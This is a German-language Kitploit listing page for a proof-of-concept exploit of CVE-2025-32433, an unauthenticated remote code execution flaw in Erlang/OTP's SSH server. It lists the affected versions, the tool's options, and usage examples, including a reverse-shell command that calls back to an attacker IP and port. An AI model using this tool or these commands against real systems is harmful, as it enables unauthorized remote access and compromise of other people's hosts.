Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — Die Schwachstelle ermöglicht es einem Angreifer mit Netzwerkzugriff auf einen Erlang/OTP SSH-Server, beliebigen Code ohne vorherige Authentifizierung auszuführen. | Kitploit
Tools/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
SchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

Die Schwachstelle ermöglicht es einem Angreifer mit Netzwerkzugriff auf einen Erlang/OTP SSH-Server, beliebigen Code ohne vorherige Authentifizierung auszuführen.

Repository anzeigen
1623vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

Die Sicherheitslücke ermöglicht es einem Angreifer mit Netzwerkzugriff auf einen Erlang/OTP SSH-Server, ohne vorherige Authentifizierung beliebigen Code auszuführen.

Beschreibung

Eine schwerwiegende Sicherheitslücke wurde im Erlang/OTP SSH-Server identifiziert, die es einem Angreifer ermöglichen kann, eine nicht authentifizierte Remote-Codeausführung (RCE) durchzuführen. Durch die Ausnutzung eines Fehlers in der Behandlung von SSH-Protokollnachrichten könnte ein böswilliger Akteur unbefugten Zugriff auf betroffene Systeme erlangen und ohne gültige Anmeldeinformationen beliebige Befehle ausführen. Dies könnte zur Kompromittierung der genannten Hosts führen und Dritten unbefugten Zugriff auf und Manipulation von sensiblen Daten ermöglichen oder Denial-of-Service-Angriffe verursachen.

Betroffene Versionen

root@kitploit:~
OTP-27.3.2 und früher
OTP-26.2.5.10 und früher
OTP-25.3.2.19 und früher

Funktionen

  • Schwachstellenscan: Ermittelt, ob ein Ziel für CVE-2025-32433 anfällig ist.
  • Exploit-Ausführung: Führt beliebige Befehle aus.
  • Reverse Shell: Startet eine bash-basierte Reverse Shell.

Verwendung

root@kitploit:~
python cve-2025-32433.py <host> [options]

Optionen:

root@kitploit:~
-p PORT, --port PORT: SSH-Port (Standard: 22)

-t TIMEOUT, --timeout TIMEOUT: Verbindungs-Timeout in Sekunden (Standard: 5)

-c COMMAND, --command COMMAND: Benutzerdefinierter Befehl zur Ausführung

--check: Prüfen, ob das Ziel anfällig ist

-u urls.txt, --urlfile urls.txt: Datei mit Liste der zu scannenden Hosts (einer pro Zeile)

-o output.txt, --output output.txt: Ausgabedatei zum Speichern der Ergebnisse.

--shell: Reverse Shell starten

--lhost LHOST: IP des Angreifers für Reverse Shell

--lport LPORT: Port des Angreifers für Reverse Shell (Standard: 4444)

Beispiele:

Schwachstellenprüfung:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

Befehl ausführen:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

Reverse Shell initiieren:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Referenzen

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Tool herunterladen